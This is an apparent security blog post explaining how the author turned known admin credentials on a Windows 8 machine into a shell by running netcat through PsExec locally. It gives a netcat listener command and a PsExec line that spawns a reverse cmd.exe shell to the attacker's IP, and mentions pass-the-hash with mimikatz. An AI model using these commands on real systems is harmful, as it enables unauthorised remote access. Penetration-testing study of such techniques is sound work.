For this post I am going to talk about something I messed around with for a while. But first a little background. I was playing around inside of a Windows 8 enterprise system, I had credentials of the admin user. SMB and RDP were unavailable. I had tried PTH (Pass The Hash) with mimikatz and some other things as well, like a lot of ways to try and get runas to read my input. Including some powershell tricks which did not work due to WinRM being disabled. At this point I was getting frustrated because I am so close to having administrator privileges but so far! I was talking to a friend who told me about running PsExec locally. This way I could put a password in the command line arguments and execute a command with the privileges of that user. I tried PsExec locally, fiddled around with it a bit (being frustrated because of my little Windows experience). I finally got PsExec to hang instead of an error about PsExecSvc access denied. Then I thought maybe it was spawning a GUI cmd.exe. So I uploaded Netcat and began to mess around with it but couldn't get it to work, again because of lack of Windows knowledge. However, eventually I got it to work. Here is what I did.

First obviously you need the credentials of the user, we will say the username is "tom", the password is "iamtom" and we have a hostname of "TOMSCOMP".

Second you need PsExec.exe and nc.exe on the system.

You will need to start a listener on your attacking machine like so:

nc -lvp 8080

Next you need to execute nc.exe with PsExec.exe using the credentials of the user you want to intrude. My command looked like this

PsExec -u tom -p iamtom \\TOMSCOMP C:\path\to\nc.exe IP_OF_ATTACKING_SYSTEM 8080 -e C:\windows\system32\cmd.exe

This then spawned a reverse TCP shell using netcat that connected back to my attacking machine on port 8080 with a pretty cmd prompt as tom! Hopefully you thought this was interesting! I have seen a lot of frustration around this situation where one has credentials but can't seem to escalate with just a layer 4 shell. To a windows guru this is probably very basic, but to someone like me who grew up on Linux this is a beautiful find!